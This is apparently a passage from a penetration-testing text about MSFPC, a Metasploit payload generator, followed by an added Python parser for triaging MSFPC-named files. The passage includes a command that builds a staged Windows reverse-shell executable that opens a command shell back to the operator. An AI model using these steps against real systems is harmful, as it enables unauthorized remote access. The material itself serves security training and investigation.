MSFvenom Payload Creator

MSFvenom Payload Creator (MSFPC) is a user-friendly multiple payload generator that can be used to generate Metasploit payloads based on user-selected options. The user doesn't need to execute the long msfvenom commands to generate payloads anymore. With MSFPC, the user can generate the payloads with far fewer commands.

Before downloading the tool, Metasploit should be installed on the system. MSFPC is just a simple bash script, which means that it can be executed on *nix systems.

We can download the MSFPC package from https://github.com/g0tmi1k/mpc. We can either download the repository in a ZIP file or we can clone the repository on our local system by running the following command:

git clone https://github.com/g0tmi1k/mpc

After cloning the repo, let's give the msfpc.sh file execute permission. Running the script with no arguments prints its usage line:

cd mpc/
chmod +x msfpc.sh
./msfpc.sh

./msfpc.sh <TYPE> (<DOMAIN/IP>) (<PORT>) (<CMD/MSF>) (<BIND/REVERSE>) (<STAGED/STAGELESS>) (<TCP/HTTP/HTTPS/FIND_PORT>) (<BATCH/LOOP>) (<VERBOSE>)

  • TYPE: The payload can be in any of the following formats (this option corresponds to the -f switch in msfvenom): APK [android], ASP, ASPX, Bash [.sh], Java [.jsp], Linux [.elf], OSX [.macho], Perl [.pl], PHP, Powershell [.ps1], Python [.py], Tomcat [.war], Windows [.exe // .dll].
  • DOMAIN/IP: This is the LHOST option when generating payloads in msfvenom.
  • PORT: This is the LPORT option when generating payloads in msfvenom.
  • CMD/MSF: This is the type of shell dropped once the payload is executed on the target system. The CMD option can be used when you want to get a standard command shell; that is, the Command Prompt shell (cmd.exe) for Windows and Terminal (/bin/bash) for *nix. In some cases, where the size of the shellcode matters, it's better to use the classic reverse shell payload. CMD can be used in situations like these.

Generating a simple classic reverse shell payload can be done by executing the following command:

sh msfpc.sh cmd windows en0

The preceding command generates a payload with cmd as the preferred shell for Windows and sets LHOST to the IP address of the en0 Ethernet interface.

As you can see from the preceding screenshot, MSFPC created two files in the same directory:

  • The executable payload: windows-shell-staged-reverse-tcp-443.exe
  • The resource file: windows-shell-staged-reverse-tcp-443-exe.rc

The naming convention for the files is easy to understand, as they are named after the options used during creation. We just created a Windows staged (explained later in this chapter) executable which, when executed on the target server, will connect back to our system (a reverse connection) on our local port 443 and drop us a command prompt shell. Hence, windows-shell-staged-reverse-tcp-443.exe. It is preferable to have a reverse shell instead of a bind shell (explained in later chapters).
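As an added example (not part of the original text or of the MSFPC project), the following Python parser recovers the option fields encoded in MSFPC-style file names such as the two above, which is useful when triaging files found on a host during an investigation. It assumes the tokens always appear in the order shown in the usage line, and that the resource file folds the payload extension into its base name (as in windows-shell-staged-reverse-tcp-443-exe.rc).

```python
import re
from dataclasses import dataclass
from typing import Optional

# Allowed tokens, taken from the MSFPC usage line on this page.
SHELLS = {"shell", "meterpreter"}          # CMD -> shell, MSF -> meterpreter
STAGING = {"staged", "stageless"}
DIRECTION = {"bind", "reverse"}
TRANSPORTS = {"tcp", "http", "https", "find_port"}

@dataclass(frozen=True)
class MsfpcName:
    platform: str      # e.g. "windows", "linux", "php"
    shell: str         # "shell" or "meterpreter"
    staging: str       # "staged" or "stageless"
    direction: str     # "bind" or "reverse"
    transport: str     # "tcp", "http", "https" or "find_port"
    port: int          # LPORT used when the payload was generated
    ext: str           # payload extension, e.g. "exe"
    is_resource: bool  # True for the companion .rc handler script

# Assumed layout: <platform>-<shell>-<staging>-<direction>-<transport>-<port>
# followed by either ".<ext>" (payload) or "-<ext>.rc" (resource file).
_NAME_RE = re.compile(
    r"^(?P<platform>[a-z0-9]+)-(?P<shell>[a-z]+)-(?P<staging>[a-z]+)-"
    r"(?P<direction>[a-z]+)-(?P<transport>[a-z_]+)-(?P<port>\d+)"
    r"(?:-(?P<rcext>[a-z0-9]+)\.rc|\.(?P<ext>[a-z0-9]+))$"
)

def parse_msfpc_name(filename: str) -> Optional[MsfpcName]:
    """Return the fields encoded in an MSFPC-style file name, or None when the
    name does not follow the convention (so unrelated files are not mis-tagged)."""
    m = _NAME_RE.match(filename.rsplit("/", 1)[-1].lower())
    if not m:
        return None
    d = m.groupdict()
    if (d["shell"] not in SHELLS or d["staging"] not in STAGING
            or d["direction"] not in DIRECTION or d["transport"] not in TRANSPORTS):
        return None
    port = int(d["port"])
    if not 1 <= port <= 65535:
        return None
    is_rc = d["rcext"] is not None
    return MsfpcName(d["platform"], d["shell"], d["staging"], d["direction"],
                     d["transport"], port, d["rcext"] if is_rc else d["ext"], is_rc)

if __name__ == "__main__":
    # Constructed sample names: the two files from the text plus an unrelated one.
    for name in ("windows-shell-staged-reverse-tcp-443.exe",
                 "windows-shell-staged-reverse-tcp-443-exe.rc", "notes.txt"):
        print(name, "->", parse_msfpc_name(name))
```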